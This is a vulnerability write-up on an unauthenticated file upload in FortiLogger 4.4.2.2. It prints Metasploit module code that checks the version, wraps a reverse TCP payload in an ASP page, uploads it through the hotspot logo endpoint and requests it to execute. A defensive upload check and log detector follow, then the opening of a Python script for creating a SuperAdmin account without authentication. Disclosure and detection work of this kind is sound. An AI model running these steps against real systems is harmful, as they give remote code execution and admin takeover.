FortiLogger is a web-based logging and reporting product designed specifically for FortiGate firewalls and running on Windows operating systems. It provides features such as instant status tracking, logging, search/filtering, reporting and a hotspot module.
Vulnerability Discovery
This vulnerability was found in the company logo upload under Hotspot Settings (http://<IP>:5000/config/hotspotsettings). An anonymous user can send a file, without any authentication or session header, via a POST request to /Config/SaveUploadedHotspotLogoFile.
The file is written to C:\Program Files\RZK\Fortilogger\Web\Assets\temp\hotspot\img under the name logohotspot, without any check of the file extension or content.
Using this vulnerability, a malicious file can be uploaded and then accessed on the remote server where the application is running.
Vulnerability Exploitation
I found and tested this vulnerability on version 4.4.2.2 for now, so the first step is to check the version of the application. The application has an API that returns some information about the application via a POST request to /shared/GetProductInfo; I only take the version number from it.
```ruby
    # res holds the response to the POST /shared/GetProductInfo request
    # issued earlier in the check method (the request itself is not shown here).
    unless res
      return CheckCode::Unknown('Target is unreachable.')
    end

    unless res.code == 200
      return CheckCode::Unknown("Unexpected server response: #{res.code}")
    end

    # Only the 'Version' field of the product-info JSON is used.
    version = Gem::Version.new(JSON.parse(res.body)['Version'])

    # 4.4.2.2 is the only version tested so far.
    if version <= Gem::Version.new('4.4.2.2')
      CheckCode::Vulnerable("FortiLogger version #{version}")
    else
      CheckCode::Safe("FortiLogger version #{version}")
    end
  rescue JSON::ParserError
    fail_with(Failure::UnexpectedReply, 'The target may have been updated')
  end
end
```
Generate ASP reverse TCP payload
```ruby
# Wrap the generated executable payload in an ASP page.
def create_payload
  Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
end
```
The part below uploads the payload to the target system; since we already know the file ends up at /Assets/temp/hotspot/img/logohotspot.asp, it then requests that path to trigger the reverse connection:
```ruby
    # res holds the response to the POST /Config/SaveUploadedHotspotLogoFile
    # upload request issued earlier in the exploit method (not shown here).
    unless res
      fail_with(Failure::Unknown, 'No response from server')
    end

    unless res.code == 200
      fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
    end

    json_res = begin
      JSON.parse(res.body)
    rescue JSON::ParserError
      nil
    end

    if json_res.nil? || json_res['Message'] == 'Error in saving file'
      fail_with(Failure::UnexpectedReply, 'Error uploading payload')
    end

    print_good('Payload has been uploaded')

    handler

    # Request the uploaded file so the server executes it.
    print_status('Executing payload...')
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
      'method' => 'GET'
    }, 5)
  rescue StandardError => e
    fail_with(Failure::UnexpectedReply, "Failed to execute the payload: #{e}")
  end
end
```
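As an added defender-side example (not from the original post, the Metasploit module or FortiLogger itself), the code below covers both what the Vulnerability Discovery section describes and the upload-then-trigger step above: an allowlist check of the kind the upload handler lacks (extension and content must both be an image), and a scan over web-server access-log lines for POSTs to the upload endpoint and for the stored logo being fetched under a non-image extension. The endpoint paths and the logohotspot file name come from the write-up; the log format, sample lines and IP addresses are constructed.

```python
import re
from typing import Dict, List

# Paths from the write-up; everything else here is constructed for the example.
UPLOAD_ENDPOINT = "/Config/SaveUploadedHotspotLogoFile"
LOGO_PREFIX = "/Assets/temp/hotspot/img/logohotspot"
IMAGE_EXT = {"png", "jpg", "jpeg", "gif", "bmp"}
# Leading magic bytes for the image types a hotspot logo should be limited to.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a", b"BM")

# Common/combined access-log line (constructed format, not FortiLogger's own).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def safe_logo_upload(filename: str, content: bytes) -> bool:
    """Allowlist check the vulnerable handler lacks: extension AND content must be an image."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in IMAGE_EXT:
        return False
    return content.startswith(IMAGE_MAGIC)


def find_suspicious(lines: List[str]) -> List[Dict[str, str]]:
    """Flag logo uploads and fetches of the stored logo under a non-image extension."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        # Compare case-insensitively: the server is IIS on Windows and the
        # write-up itself mixes /config/... and /Config/... spellings.
        if m["method"] == "POST" and path.lower() == UPLOAD_ENDPOINT.lower():
            hits.append({"ip": m["ip"], "reason": "logo upload", "path": path})
        elif path.lower().startswith(LOGO_PREFIX.lower()) and ext not in IMAGE_EXT:
            hits.append({"ip": m["ip"], "reason": f"logo fetched as .{ext}", "path": path})
    return hits


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.7 - - [30/Jan/2021:10:00:01 +0000] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 200 45',
    '203.0.113.7 - - [30/Jan/2021:10:00:03 +0000] "GET /Assets/temp/hotspot/img/logohotspot.asp HTTP/1.1" 200 0',
    '198.51.100.2 - - [30/Jan/2021:10:05:00 +0000] "GET /Assets/temp/hotspot/img/logohotspot.png HTTP/1.1" 200 8812',
    '198.51.100.2 - - [30/Jan/2021:10:05:01 +0000] "POST /shared/GetProductInfo HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```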
POC
Bonus | Unauthenticated SuperAdmin User Creation
This software also has two more vulnerabilities: information disclosure, and user creation without any authorization or session header. Here is the exploit.
```
python3 fortilogger_vuln.py

FortiLogger | Log and Report System - v4.4.2.2 Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
Berkan Er <b3rsec@protonmail.com> @erberkan

Usage: python3 fortilogger_vuln.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >
    IP:    IP Address of FortiLogger host
    PORT:  Port number of FortiLogger host
    TRUE:  Create User
    FALSE: Show Product Infos
```
```python
# Exploit Title: FortiLogger - Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
# Date: 30-01-2021
# Exploit Author: Berkan Er
# Vendor Homepage: https://www.fortilogger.com/
# Version: 4.4.2.2
# Tested on: Windows 10 Enterprise
# A remote attacker can create a user with the SuperAdmin profile

#!/usr/bin/python3

import argparse
import string
import sys
from random import random

import requests
import json

banner = '''
FortiLogger | Log and Report System - v4.4.2.2 Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
Berkan Er <b3rsec@protonmail.com> @erberkan
'''
```